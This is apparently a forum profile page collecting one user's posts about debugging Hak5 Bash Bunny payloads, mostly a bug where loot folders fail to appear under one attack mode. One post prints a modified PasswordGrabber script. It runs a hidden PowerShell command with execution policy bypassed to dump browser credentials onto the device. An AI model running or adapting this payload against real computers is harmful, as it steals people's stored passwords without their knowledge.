Jump to content

OblivionX

Active Members
  • Content Count

    6
  • Joined

  • Last visited

About OblivionX

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. I tried to mkdir before the ATTACKMODE , and it works! I did it before your post hehehe, but I had to wait 24 hours to post again hehe.... I saw that there's a pull request of PasswordGraber V2 and the position of ATTACKMODE has changed, right after mkdir. I still want to know why this doesn't happen with ATTACKMODE RNDIS_EHTERNET. With this kind of attackmode I can create folders after ATTACKMODE with no problem, like QuickCreds.....
  2. You can use the Bash Bunny Updater to get all the language files!
  3. Is Firefox working for you? I can only see the Creds Dumped from Chrome....
  4. I've found that, if I use ATTACKMODE only, with no mode , before the mkdir command, and right after mkdir I use ATTACKMODE HID STORAGE, the problems is solved too...example in password grabber: # Options LOOTDIR=/root/udisk/loot/PasswordGrabber ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE # <----------------------------------------------------------THIS SOLVED THE ISSUE (ATTACKMODE HID STORAGE WAS HERE IN THE ORIGINAL PAYLOAD) ######## MAKE LOOT DIRECTORY ######## # Setup named logs in loot directory mkdir -p $LOOTDIR ######## ATTACK ######## ATTACKMODE HID STORAGE <---------------------------------- NOW I SET THE ATACKMODE HID STORAGE LED ATTACK RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" # Wait until passwords are grabbed. sleep 25 ######## FINISH ######## LED FINISH
  5. I'm using the latest firmware (1.5_298) , I did the Bash Bunny reset procedure (unplug 3 times ,etc etc), did the "udisk reformat" and updated everything wit Bash Bunny Updater. The payloads are working, the issue above is the only annoying thing.
  6. Hi! I've started using the bash bunny and I've noticed that when I use a payload that uses ATTACKMODE HID STORAGE and use the mkdir command to create a folder inside the loot foolder (PasswordGrabber and WiPassDump for example), I can't see the folder created by them on the first time. If I change to arming mode and check, the folder appears but empty (and it only appears in arming mode, if i run the first time the payload and dont remove the Bash Bunny, it wont appear)! If i run the payload again, now that the folder is already created (the folder now appears on switch 1 or 2 ) everything works ok. If I create manually the folder inside the loot folder for the payload, it will work too on the first time. All that I said is related to ATTACKMODE HID STORAGE, because if I use a payload like QuickCreds, it will create its folder inside loot folder and everything works in the first time! If I change the ATTACKMODE in PasswordGrabber and WiPassDump to ATTACKMODE RNDIS_ETHERNET before the "mkdir" comand and then use ATTACKMODE HID STORAGE again right after the "mkdir" command, then these payloads will work for the first time too!! So is there any problem with ATTACKMODE HID STORAGE to create folder inside loot folder for the first time you run a payload? Why this is not happening with payloads that uses ATTACKMODE RNDIS_ETHERNET?
×
×
  • Create New...